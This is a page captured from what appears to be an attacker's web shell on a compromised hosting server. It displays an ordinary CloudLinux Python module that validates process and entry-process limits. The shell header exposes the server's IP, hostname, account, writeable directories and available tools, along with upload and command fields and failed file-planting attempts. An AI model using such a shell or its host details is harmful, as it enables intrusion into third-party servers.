Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.224.57.25
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/cloudlinux/venv/lib64/python3.11/site-packages/cllimits_validator/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/cloudlinux/venv/lib64/python3.11/site-packages/cllimits_validator/ep_nproc_validator.py
# coding: utf-8
#
# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2019 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT

from typing import Dict, Optional, Tuple, Union  # NOQA

from cllimitslib_v2 import LimitsDataStorage, DEFAULTS  # NOQA
from cllimitslib_v2.lve_storage import (
    Package, User, Reseller, OWN_SOURCE, RESELLER_SOURCE,  # NOQA
    PACKAGE_SOURCE, GLOBAL_SOURCE
)

from .base import BaseValidator, ENTITY_USER, ENTITY_PACKAGE, ENTITY_RESELLER, ENTITY_DEFAULTS


class EpNprocValidator(BaseValidator):

    def __init__(self, _limits_data_storage=None):
        # type: (LimitsDataStorage) -> None

        super().__init__(_limits_data_storage=_limits_data_storage)

        # difference beetween nproc limit and ep for normal server work
        # see LU-919
        self.diff_nproc_and_ep = 15

    @property
    def message_dict(self):
        # type: () -> Dict

        common_msg = (
            f'NPROC limit must be greater than EP + {self.diff_nproc_and_ep} limit, because '
            'number of processes and threads within LVE includes '
            'also Apache processes/threads, SSH sessions and etc, '
            'which enter into LVE.'
        )

        message_dict = dict(self._message_dict)
        message_dict['common_msg'] = common_msg
        return message_dict

    def _ep_and_nproc_is_valid(self, ep, nproc):
        # type: (int, int) -> bool
        if nproc == 0 or ep == 0:
            result = True
        else:
            result = nproc >= ep + self.diff_nproc_and_ep
        return result

    def _validate_nproc_and_ep_for_user(self, user, ep, nproc, has_input_limits):
        # type: (User, Union[int, None], Union[int, None], bool) -> Tuple[bool, Dict]
        """
        :param has_input_limits: User has input limits, which will be set to it
        """

        message_dict = self.message_dict

        user_limits = self.limits_provider.get_user_limits(user)

        ep = int(ep or user_limits.ep.value)
        nproc = int(nproc or user_limits.nproc.value)

        result = self._ep_and_nproc_is_valid(ep, nproc)

        ep_source = user_limits.ep.source
        nproc_source = user_limits.nproc.source

        if has_input_limits:
            message_dict['affected_entity'] = ENTITY_USER
            message_dict['entity_id'] = user.id
        elif OWN_SOURCE in (nproc_source, ep_source):
            message_dict['affected_entity'] = ENTITY_USER
            message_dict['entity_id'] = user.id
            if ep_source != OWN_SOURCE:
                inheritance_limit = 'ep'
            elif nproc_source != OWN_SOURCE:
                inheritance_limit = 'nproc'
            else:
                inheritance_limit = None
            message_dict['specific_msg'] = None if inheritance_limit is None else (
                f'{inheritance_limit.upper()} is inherited '
                f'from {getattr(user_limits, inheritance_limit).source.capitalize()}'
            )
        elif OWN_SOURCE not in (nproc_source, ep_source) and nproc_source == ep_source:
            message_dict['affected_entity'] = ep_source
            if ep_source == PACKAGE_SOURCE:
                message_dict['entity_id'] = user.package.name
            elif ep_source == RESELLER_SOURCE:
                message_dict['entity_id'] = user.reseller.name
            elif ep_source == GLOBAL_SOURCE:
                message_dict['entity_id'] = ENTITY_DEFAULTS
        elif OWN_SOURCE not in (nproc_source, ep_source) and nproc_source != ep_source:
            message_dict['affected_entity'] = ENTITY_USER
            message_dict['entity_id'] = user.id
            message_dict['specific_msg'] = (
                'Both validated limits (EP, NPROC) inheritance '
                f'from different sources: {ep_source} and {nproc_source}'
            )
        return result, message_dict

    def _validate_nproc_and_ep_for_package(self, package, ep, nproc, has_input_limits):
        # type: (Package, Union[int, None], Union[int, None], bool) -> Tuple[bool, Dict]
        """
        :param has_input_limits: User has input limits, which will be set to it
        """

        message_dict = self.message_dict

        package_limits = self.limits_provider.get_package_limits(package)

        ep = int(ep or package_limits.ep.value)
        nproc = int(nproc or package_limits.nproc.value)

        result = self._ep_and_nproc_is_valid(ep, nproc)

        ep_source = package_limits.ep.source
        nproc_source = package_limits.nproc.source

        if has_input_limits:
            message_dict['affected_entity'] = ENTITY_PACKAGE
            message_dict['entity_id'] = package.name
        elif OWN_SOURCE in (nproc_source, ep_source):
            message_dict['affected_entity'] = ENTITY_PACKAGE
            message_dict['entity_id'] = package.name
            if ep_source != OWN_SOURCE:
                inheritance_limit = 'ep'
            elif nproc_source != OWN_SOURCE:
                inheritance_limit = 'nproc'
            else:
                inheritance_limit = None
            message_dict['specific_msg'] = None if inheritance_limit is None else (
                f'{inheritance_limit.upper()} is inherited '
                f'from {getattr(package_limits, inheritance_limit).source.capitalize()}'
            )
        elif OWN_SOURCE not in (nproc_source, ep_source) and nproc_source == ep_source:
            message_dict['affected_entity'] = ep_source
            if ep_source == RESELLER_SOURCE:
                message_dict['entity_id'] = package.provider.name
            elif ep_source == GLOBAL_SOURCE:
                message_dict['entity_id'] = ENTITY_DEFAULTS
        elif OWN_SOURCE not in (nproc_source, ep_source) and nproc_source != ep_source:
            message_dict['affected_entity'] = ENTITY_PACKAGE
            message_dict['entity_id'] = package.name
            message_dict['specific_msg'] = (
                'Both validated limits (EP, NPROC) inheritance '
                f'from different sources: {ep_source} and {nproc_source}'
            )
        return result, message_dict

    def _validate_nproc_and_ep_for_reseller(self, reseller, ep, nproc, has_input_limits):
        # type: (Reseller, Union[int, None], Union[int, None], bool) -> Tuple[bool, Dict]
        """
        :param has_input_limits: User has input limits, which will be set to it
        """

        message_dict = self.message_dict

        reseller_limits = self.limits_provider.get_reseller_limits(reseller)

        ep = int(ep or reseller_limits.ep.value)
        nproc = int(nproc or reseller_limits.nproc.value)

        result = self._ep_and_nproc_is_valid(ep, nproc)

        ep_source = reseller_limits.ep.source
        nproc_source = reseller_limits.nproc.source

        if has_input_limits:
            message_dict['affected_entity'] = ENTITY_RESELLER
            message_dict['entity_id'] = reseller.name
        elif OWN_SOURCE in (nproc_source, ep_source):
            message_dict['affected_entity'] = ENTITY_RESELLER
            message_dict['entity_id'] = reseller.name
            if ep_source != OWN_SOURCE:
                inheritance_limit = 'ep'
            elif nproc_source != OWN_SOURCE:
                inheritance_limit = 'nproc'
            else:
                inheritance_limit = None
            message_dict['specific_msg'] = None if inheritance_limit is None else (
                f'{inheritance_limit.upper()} is inherited '
                f'from {getattr(reseller_limits, inheritance_limit).source.capitalize()}'
            )

        return result, message_dict

    def _validate_nproc_and_ep_for_defaults(self, reseller, ep, nproc, has_input_limits):
        # type: (Union[Reseller, DEFAULTS], Union[int, None], Union[int, None], bool) -> Tuple[bool, Dict]
        """
        :param has_input_limits: User has input limits, which will be set to it
        """

        message_dict = self.message_dict

        id_entity = reseller.name if isinstance(reseller, Reseller) else DEFAULTS

        default_limits = self.limits_provider.get_defaults_limits(reseller)

        ep = int(ep or default_limits.ep.value)
        nproc = int(nproc or default_limits.nproc.value)

        result = self._ep_and_nproc_is_valid(ep, nproc)

        ep_source = default_limits.ep.source
        nproc_source = default_limits.nproc.source

        if has_input_limits:
            message_dict['affected_entity'] = ENTITY_DEFAULTS
            message_dict['entity_id'] = id_entity
        elif OWN_SOURCE in (nproc_source, ep_source):
            message_dict['affected_entity'] = ENTITY_DEFAULTS
            message_dict['entity_id'] = id_entity
            if ep_source != OWN_SOURCE:
                inheritance_limit = 'ep'
            elif nproc_source != OWN_SOURCE:
                inheritance_limit = 'nproc'
            else:
                inheritance_limit = None
            message_dict['specific_msg'] = None if inheritance_limit is None else (
                f'{inheritance_limit.upper()} is inherited '
                f'from {getattr(default_limits, inheritance_limit).source.capitalize()}'
            )

        return result, message_dict

    def _validate(self, validated_entity, ep, nproc, has_input_limits, check_reseller_defaults=False):
        # type: (Union[User, Reseller, Package, None], Optional[int], Optional[int], bool, bool) -> Tuple[bool, Dict]

        message_dict = self.message_dict
        result = True

        if isinstance(validated_entity, User):
            result, message_dict = self._validate_nproc_and_ep_for_user(
                validated_entity,
                ep,
                nproc,
                has_input_limits
            )
        elif isinstance(validated_entity, Package):
            result, message_dict = self._validate_nproc_and_ep_for_package(
                validated_entity,
                ep,
                nproc,
                has_input_limits
            )
        elif isinstance(validated_entity, Reseller) and not check_reseller_defaults:
            # we validate reseller limits
            result, message_dict = self._validate_nproc_and_ep_for_reseller(
                validated_entity,
                ep,
                nproc,
                has_input_limits
            )
        elif isinstance(validated_entity, Reseller) and check_reseller_defaults or validated_entity == DEFAULTS:
            # we validate default limits (include reseller defaults)
            result, message_dict = self._validate_nproc_and_ep_for_defaults(
                validated_entity,
                ep,
                nproc,
                has_input_limits
            )

        return result, message_dict

    def validate_existing_limits(self, validated_entity, check_reseller_defaults=False):
        # type: (Union[User, Reseller, Package, None], bool) -> Tuple[bool, Dict]
        """
        Validate limits which already are recorded in ve.cfg
        """

        result, message_dict = self._validate(validated_entity, None, None, False, check_reseller_defaults)

        return result, message_dict

    def validate_input_limits(self, validated_entity, input_limits, check_reseller_defaults=False):
        # type: (Union[User, Reseller, Package, None], Dict, bool) -> Tuple[bool, Dict]
        """
        Validate limits which we want to set
        """

        message_dict = self.message_dict

        nproc = input_limits.get('nproc', None)
        ep = input_limits.get('ep', None)
        # if input_limits has no ep and nproc we set has_settable_limits to None
        # It means nothing to validate
        has_input_limits = nproc is not None or ep is not None

        # We skip check if nproc is unlimited or input limits don't have ep and nproc values
        if nproc == 0 or not has_input_limits:
            result = True
        else:
            result, message_dict = self._validate(validated_entity, ep, nproc,
                                                  has_input_limits, check_reseller_defaults)

        return result, message_dict

Youez - 2016 - github.com/yon3zu
LinuXploit